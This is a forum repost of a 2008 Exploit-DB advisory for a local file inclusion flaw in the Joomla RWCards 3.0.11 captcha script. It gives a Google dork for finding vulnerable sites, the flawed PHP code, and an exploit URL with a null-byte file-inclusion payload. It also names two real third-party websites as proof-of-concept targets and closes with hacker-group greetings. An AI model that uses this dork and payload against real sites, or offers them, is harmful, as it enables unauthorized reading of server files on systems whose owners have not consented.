Exploit Joomla! Component RWCards 3.0.11 - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6817
Проверка EDB
  1. Пройдено
Автор
VRS-HCK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6172
Дата публикации
2008-10-23
Код:
[o]------------------------------------------------------------------------------------[x]
 |  Local File Inclusion Vulnerability                                                  |
[o]------------------------------------------------------------------------------------[o]
 |  Software : RWCards 3.0.11 Component for Joomla 1.5 CMS                              |
 |  Vendor   : http://www.weberr.de/                                                    |
 |  Date     : 23 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
 |  Contact  : d00r[at]telkom[dot]net                                                   |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    inurl:com_rwcards

[»] Vulnerable

    ./components/com_rwcards/captcha/captcha_image.php

    15: if (!empty( $_GET['img'] ) )
    16:    $img = $_GET['img'];
    17: else
    18: {
    19:    echo 'no image file specified via &img=...';
    20:    exit;
    21: }
    22:
    23: if (!$fh = fopen( $tmp_dir_path.'cap_'.$img.'.jpg', 'rb'))
    24:    {
    25:        echo 'could not open image file!';
    26:    }
    27: else 
    28: {	
    29:     fpassthru( $fh );
    30:     fclose( $fh );
    31: }    

[»] Exploit

    http://[site]/[path]/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00

[»] Proof of Concept

    http://www.abcdobebe.com/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
    http://www.whiskynet.co.uk/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
 |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem,   |
 |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,        |
 |  chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!!                     |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2008-10-23]
 
Источник
www.exploit-db.com

Похожие темы